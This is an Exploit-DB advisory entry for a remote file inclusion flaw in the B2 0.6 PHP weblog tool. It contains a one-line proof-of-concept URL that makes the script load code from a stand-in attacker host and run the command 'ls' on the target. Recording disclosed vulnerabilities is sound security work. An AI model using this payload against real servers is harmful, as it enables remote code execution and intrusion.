B2 0.6 - 'b2edit.showposts.php?b2inc' Remote File Inclusion

EDB-ID:

21436


Author:

Frank

Type:

webapps


Platform:

PHP

Date:

2002-05-06


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

source: https://www.securityfocus.com/bid/4673/info

B2 is a news/weblog tool written in php. b2 allows webmasters to quickly post news on the frontpage, and let viewers interact with each other. It is available primarily for Unix and Linux.

A variable that is referenced in the PHP scripts does not actually exist. Thus, an attacker may be able to define the value of the variable. By creating a PHP script on the remote side and embedding commands in it, the attacker is able to reference the remote file. This could potentially allow the attacker to execute commands on the vulnerable system. 

http://www.vulnerablehost.com/b2/b2-include/b2edit.showposts.php?b2inc=http://www.attacker.com&cmd=ls